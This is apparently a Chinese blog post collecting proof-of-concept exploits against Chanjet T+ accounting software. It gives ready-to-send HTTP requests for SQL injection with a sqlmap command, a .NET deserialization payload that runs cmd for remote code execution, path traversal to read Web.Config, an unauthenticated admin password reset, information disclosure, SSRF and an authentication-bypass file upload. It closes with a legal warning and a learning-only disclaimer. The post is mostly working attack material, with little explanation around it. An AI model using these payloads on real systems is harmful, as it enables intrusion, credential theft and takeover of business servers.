畅捷通漏洞大全集合
畅捷通漏洞大全集合
原创 丁永博 丁永博的成长日记 2024-03-15 18:43
一、 前台SQL注入漏洞复现(QVD-2023-13612)
chanjet-tplus-checkmutex-sqli
POC1:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=z4uf2zxaxzzew254iwju3fvn
Content-Length: 253
python sqlmap.py -r url.txt --level 3 --risk 3 --dbs
chanjet-tplus-ufida-sqli
POC2:
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 346
Content-Type: application/json
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
{
"AccountNum":"*",
"UserName":"admin",
"Password":"e10adc3949ba59abbe56e057f20f883e",
"rdpYear":"2022",
"rdpMonth":"2",
"rdpDate":"21",
"webServiceProcessID":"admin",
"ali_csessionid":"",
"ali_sig":"",
"ali_token":"",
"ali_scene":"",
"role":"",
"aqdKey":"",
"formWhere":"browser",
"cardNo":""
}
PS:先执行个–sql-shell 然后直接用语句查询 ,即可出来管理员账密+数据库账密。
select * from eap_configpath
二、畅捷通T+ .net反序列化RCE
chanjet-tplus-rce
POC:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=v0rnaavxoe41hsijum0uc4bl
Upgrade-Insecure-Requests: 1
Content-Length: 594
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ipconfig > test.txt"
}
}
}
}
访问
http://xxx/tplus/test.txt
三、文件读取漏洞
chanjet-tplus-file-read
POC
:
http://xxxxxx/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
四、用友畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
chanjet-tplus-unauth-update
重置账号密码为 admin/123qwe
POC
:
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 45
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
五、前台信息泄露漏洞
POC:
/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetDefaultBackPath
六、前台SSRF漏洞
POC:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 36
Content-Type: application/json
Host: xxxx
Origin: xxxx
Pragma: no-cache
Referer:http://xxxxx/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
{
"address":"su8hjb.dnslog.cn"
}
七、文件上传
/tplus/CommonPage/UserFileUpload.aspx 文件中含有UploadUserFile函数 导致了鉴权任意文件上传(v17<= 版本可 ?preload=1 绕过)
POC:
http://xxxxx/tplus/CommonPage/UserFileUpload.aspx?preload=1
POST /tplus/CommonPage/UserFileUpload.aspx?preload=1 HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------31120366651622657084172305612
Content-Length: 873
Origin: xxxx
Connection: close
Referer: http://xxxxx/tplus/CommonPage/UserFileUpload.aspx?preload=1
Cookie: ASP.NET_SessionId=305wnhz0nngmnh5jxb2mxt0t; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1710497388; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1710497548
Upgrade-Insecure-Requests: 1
-----------------------------31120366651622657084172305612
Content-Disposition: form-data; name="__EVENTTARGET"
btUpLoad
-----------------------------31120366651622657084172305612
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------31120366651622657084172305612
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTExMjk2Njk2NjUPFgIeE1ZhbGlkYXRlUmVxdWVzdE1vZGUCARYCAgMPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkZMMPG+xpQF9Tz9ZkXNLkJDcxtSCr0/KejOFiC5BndJai
-----------------------------31120366651622657084172305612
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
ACD4EABA
-----------------------------31120366651622657084172305612
Content-Disposition: form-data; name="myFileUpload"; filename="1.txt"
Content-Type: text/plain
333
-----------------------------31120366651622657084172305612--
访问url验证
http://xxx/tplus/UserFiles/1.txt
小知识
依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系统罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。
声明
本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。
欢迎
在看
丨
留言
丨
分享至朋友圈
三连
好文推荐****